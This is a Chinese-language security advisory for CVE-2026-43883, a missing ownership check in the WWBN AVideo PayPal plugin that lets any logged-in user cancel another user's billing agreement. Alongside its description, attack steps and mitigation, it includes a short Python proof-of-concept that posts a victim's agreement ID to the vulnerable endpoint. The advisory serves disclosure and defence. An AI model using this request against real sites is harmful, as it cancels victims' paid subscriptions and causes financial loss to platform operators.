CVE-2026-43883: WWBN AVideo PayPal支付协议取消权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-43883

漏洞类型

业务逻辑漏洞/权限绕过

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个广泛使用的开源视频平台。在29.0及以下版本中，其PayPal支付插件存在严重的业务逻辑漏洞。具体而言，`plugin/PayPalYPT/agreementCancel.json.php`接口在处理取消PayPal账单协议的请求时，仅验证了用户是否登录，却未严格验证当前登录用户是否为该账单协议的所有者。这使得低权限的攻击者在获取或猜测到其他用户的协议ID后，可以恶意发送请求取消受害者的订阅服务。该漏洞不仅导致受害者付费服务中断，还会给平台运营商造成直接的经济损失，属于典型的越权访问问题。

技术细节

该漏洞属于典型的不安全的直接对象引用（IDOR）漏洞，根植于业务逻辑层面的访问控制缺失。漏洞触发点位于`plugin/PayPalYPT/agreementCancel.json.php`文件。在正常流程中，该脚本应接收用户提交的PayPal协议ID，并调用PayPal API取消订阅。然而，受影响版本的代码逻辑存在缺陷：它仅检查了请求者的会话状态以确认其为已认证用户（满足PR:L条件），但完全跳过了“请求者是否拥有该协议ID”的校验步骤。

攻击者无需拥有管理员权限，仅需一个普通账号。利用过程如下：攻击者通过浏览器开发者工具、网络嗅探或社工方式获取目标用户的PayPal Billing Agreement ID。随后，攻击者构造并发送一个包含受害者协议ID的POST请求至漏洞端点。由于服务器端缺乏所有权校验，系统将误以为这是协议所有者发起的取消请求，进而执行取消操作。这导致受害者的订阅状态在数据库中被更新，且PayPal端的计费协议被终止，造成了严重的数据完整性和可用性破坏（I:L/A:L）。

攻击链分析

STEP 1

信息收集

攻击者在平台上注册一个低权限账号，并尝试通过抓包、社工或其他方式获取目标受害者的PayPal账单协议ID（Agreement ID）。

STEP 2

构造请求

攻击者使用自己的低权限账号Session，构造一个POST请求，目标指向`plugin/PayPalYPT/agreementCancel.json.php`，并将参数`agreement`的值设置为受害者的ID。

STEP 3

越权利用

服务器接收请求，发现用户已登录（认证通过），但未校验用户是否拥有该协议ID，直接调用后台逻辑取消协议。

STEP 4

造成影响

受害者的付费订阅被意外取消，导致服务不可用，平台方遭受潜在的退费和经济损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
# Note: This is a conceptual PoC.
target_url = "https://[target-site]/plugin/PayPalYPT/agreementCancel.json.php"

# Attacker's low-privilege session cookie
attacker_cookies = {
    "PHPSESSID": "[attacker_valid_session_id]",
    "user": "[attacker_user_cookie]"
}

# Victim's PayPal Billing Agreement ID (obtained via enumeration or leakage)
victim_agreement_id = "B-XXXXXXXXXXXXX"

# Data payload to send
payload = {
    "agreement": victim_agreement_id
}

try:
    # Sending the request to cancel the victim's subscription
    response = requests.post(target_url, data=payload, cookies=attacker_cookies)

    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 29.0

防御指南

临时缓解措施

在未进行版本升级前，建议临时禁用或严格限制访问`plugin/PayPalYPT/agreementCancel.json.php`文件，或通过Web应用防火墙（WAF）添加规则，检测并拦截包含非本人协议ID的取消请求。